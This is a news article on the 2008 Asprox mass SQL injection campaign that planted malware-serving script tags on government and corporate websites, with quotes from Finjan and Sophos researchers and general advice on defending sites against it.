Security Sleuths Sound Alarm on Asprox Flare-Up

Web security firm Finjan issued a warning Thursday about a new wave of mass Web attacks that it said has affected more than 1,000 Web site domains, including government, retail, healthcare and advertising sites.

Security vendors have been aware of the attack toolkit, dubbed “Asprox,” for several years. However, they have noticed an uptick in the popularity of the malware since 2007.

In May, cyber-criminals began a new round of mass Web attacks that successfully targeted a large number of government and top business Web sites around to the world, the firm said. Those infected sites, in turn, infect their visitors, and the malware continues to spread.

It is a situation that businesses, not just consumers, should take very seriously, according to Finjan.

“Having the number of compromised, high traffic, legitimate domains [infected], I belive it’s a serious issue as many potential visitors can be infected,” said Yuval Ben-Itzhak, CTO at Finjan.

Major sites infected by Asprox include the official Web site San Francisco’s City and County government, the National Health Service in the UK, Coca-Cola’s Brazil site, Snapple’s Web site, and the official site for the University of California in Irvine, the security researcher asserted.

New Attack Vector

Hackers have designed the Asprox malware to conduct an initial search using Google for Web pages with a dotASP file extension. Once it has identified those sites, the malicious software launches SQL injection attacks that append a reference to the malware file using the script tag.

SQL injection attacks exploit a vulnerability in the Web site code, Ben-Itzhak explained. It allows the hacker to inject into the Web site database content that will later be served to all Web site visitors.

“In our case, it’s malicious content,” he added.

This, according to Finjan, makes it a highly efficient crimeware tool, as each of the compromised domains the firm documented included a reference to the malware that was served by more than 160 different domains across the Internet.

SQL injection attacks have been one of the major security headaches of 2008, with back-end databases being “peppered” with malicious code — in this case, script tags. Clean-up can be fairly painful, and there are numerous cases of Web site owners cleaning up their databases only to be hit again a few hours later. The best solution is prevention to avoid being hit in the first place, Graham Cluley, a senior technology consultant at Sophos, told TechNewsWorld.

“Hackers use SQL injection to exploit security vulnerabilities in the database running a Web site. The attack works when user input, for instance on a Web form, is not correctly filtered or checked, causing the underlying technology to execute the code and sprinkle malware throughout pages served up on the site,” he continued.

Malware such as Asprox typically tries to take advantage of a vulnerability or exploit to automatically install itself onto the users’ computer. In other cases, the malicious application’s writers will use social engineering to fool the computer user into installing the code — pretending the malware is really a codec that needs to be installed to view a video, for instance, Cluley explained.

Bad for Business

Finjan said it recorded more than 1,000 mass attacks in just the first two weeks of July.

“If anything, in our opinion, Finjan [is] being conservative about the number of Web pages that have been struck by these SQL injection attacks in recent weeks. Sophos identifies, on average, one new Web page hosting malware every five seconds — the majority of which are struck by SQL injection,” Cluley said.

Businesses with an online presence should be concerned, said both security professionals.

“As businesses cannot prevent their users from visiting these legitimate sites, they are left with a potential risk. In order to detect and prevent such attacks that come from high-traffic, legitimate sites, businesses should adopt real-time content inspection technologies in additional to their anti-virus security products,” Ben-Itzhak told TechNewsWorld.

Any business with a Web presence needs to ensure that it is properly defended — and hardened — to reduce the chances of hackers managing to inject malicious code into their site, Cluley noted.

“One of the reasons the Web is so popular with attackers today is that innocent sites can be compromised and used to infect large numbers of victims. It is easy to think that the only victim of these attacks is the innocent computer user, who is exposed to malicious code when browsing compromised,” he continued.

The most important thing a business can do is to ensure that it has published secure code on the Web site that cannot be exploited by hackers, Cluley pointed out. “Good development practice should be able to filter out attempts to blast a Web site with an SQL injection attack.”

For more information, he suggests reading an advisory Microsoft published in June that details how businesses can secure their Web applications from these sorts of attacks.

“This attack might better explain how malicious the Web is today. Unlike five years ago when we were infected by a virus that damaged our PC, today malicious content is served from compromised legitimate sites and is silently installed on our PC without our consent. Hackers have changed their attacks so we will not remove the malicious content after the infection and they can steal files, e-mails and username/password from us,” Ben-Itzhak concluded.

1 Comment

  • Thanks thebeanieman, i just downloaded the firefile from firestorm and it seems to be protecting my site nicely. Every bad query i have tried has been blocked. so far so good. so thnx. 🙂

Leave a Comment

Please sign in to post or reply to a comment. New users create a free account.

Technewsworld Channels